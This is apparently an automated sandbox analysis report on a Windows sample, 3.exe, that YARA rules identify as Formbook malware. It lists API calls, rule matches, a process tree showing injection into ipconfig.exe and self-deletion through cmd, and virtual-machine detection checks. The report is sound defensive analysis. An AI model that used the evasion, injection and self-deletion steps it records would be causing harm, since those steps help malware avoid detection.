Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001281B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00128260 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001282E0 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001282DA NtClose,
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_0230A098
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_02309FC2
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_02309C70
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_0041BBCF
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_0041C38B
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00408C4C
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00408C50
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_0041B493
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_0041C573
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00402D87
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_0041CE28
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_0041BEFB
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_0041CF7E
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_0041C7EA
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_0041BFAB
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AD20A0
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B720A8
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ABB090
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B728EC
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B7E824
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACA830
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B61002
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AC99BF
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AC4120
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AAF900
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B722AE
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B5FA2B
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ADEBB0
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B523E3
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B6DBD2
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B603DA
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ADABD8
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B72B28
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACA309
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ACAB40
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AB841F
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B6D466
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AD2581
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ABD5E0
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B725DD
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AA0D20
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B72D07
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B71D55
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B72EF7
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AC6E30
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B6D616
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B71FF1
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B7DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64AEF
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C722AE
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCB236
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C5FA2B
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BDEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C6DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C603DA
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C523E3
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD138B
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BDABD8
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C4CB4F
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA309
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C72B28
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCAB40
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD20A0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BBB090
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C728EC
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C720A8
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCA830
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C61002
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C7E824
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BC99BF
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BC4120
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BAF900
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C72EF7
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BC6E30
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C6D616
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C7DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C71FF1
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C64496
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C6D466
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BB841F
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BCB477
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C725DD
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BD2581
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C62D82
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BBD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C71D55
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BA0D20
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02C72D07
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_00111030
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_0012C38B
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_00118C50
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_00118C4C
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_0012B493
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_0012C573
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_00112D90
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_00112D87
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_0012CE28
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_0012CF7E
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_00112FB0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_0012BFAA
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_0012C7EA
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 02BAB150 appears 136 times
          Source: C:\Users\user\Desktop\3.exe | Code function: String function: 00AAB150 appears 90 times
          Source: C:\Users\user\Desktop\3.exe | Code function: String function: 0230A358 appears 40 times
          Source: C:\Users\user\Desktop\3.exe | Code function: String function: 02305898 appears 48 times
          Source: C:\Users\user\Desktop\3.exe | Code function: String function: 02304D43 appears 56 times
          Source: 3.exe | Static PE information: invalid certificate
          Source: 3.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: 3.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 3.exe, 00000001.00000003.242843726.0000000000866000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 3.exe
          Source: 3.exe, 00000001.00000002.303149513.000000000066E000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs 3.exe
          Source: 3.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.217187289.0000000003088000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000000.00000003.215422596.0000000003068000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000000.00000003.215851322.0000000003084000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.215763701.000000000306C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.215525181.0000000003080000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.216098891.0000000003098000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000000.00000003.215441416.0000000003084000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@14/5@14/5
          Source: C:\Users\user\Desktop\3.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:204:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4816:120:WilError_01
          Source: C:\Users\user\Desktop\3.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Users\user\Desktop\3.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\3.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\3.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: 3.exe | Virustotal: Detection: 58%
          Source: 3.exe | Metadefender: Detection: 42%
          Source: 3.exe | ReversingLabs: Detection: 75%
          Source: C:\Users\user\Desktop\3.exe | File read: C:\Users\user\Desktop\3.exe
          Source: unknown | Process created: C:\Users\user\Desktop\3.exe 'C:\Users\user\Desktop\3.exe'
          Source: C:\Users\user\Desktop\3.exe | Process created: C:\Users\user\Desktop\3.exe C:\Users\user\Desktop\3.exe
          Source: C:\Users\user\Desktop\3.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\3.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: 3.exe | Static file information: File size 1081696 > 1048576
          Source: Binary string: ipconfig.pdb source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 3.exe, 00000001.00000003.242702997.0000000000750000.00000004.00000001.sdmp, ipconfig.exe, 00000013.00000002.468141767.0000000002C9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 3.exe, ipconfig.exe
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_0230927C push 0040C2C8h; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_0230936A push 0040C33Bh; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_02302BF0 push 00405BA1h; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_023093E4 push 0040C378h; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_023033C8 push 00406354h; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_02304820 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_023030B6 push 00406044h; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_023030B8 push 00406044h; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_02300094 push eax; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_02302ED0 push 00405E5Ch; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_02302ECE push 00405E5Ch; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_02308F1A push 0040C2C8h; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_02302F08 push 00405E94h; ret
          Source: C:\Users\user\Desktop\3.exe | Code function: 0_3_023075B0 push eax; ret

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\3.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\3.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000001185E4 second address: 00000000001185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 000000000011896E second address: 0000000000118974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\3.exe Code function: 1_2_004088A0 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 5680 Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
          Source: explorer.exe, 00000005.00000000.270082928.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.270082928.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.261950637.0000000004E61000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAR
          Source: explorer.exe, 00000005.00000000.269457825.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.267696288.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.293624505.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.270082928.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.270082928.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.270166589.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
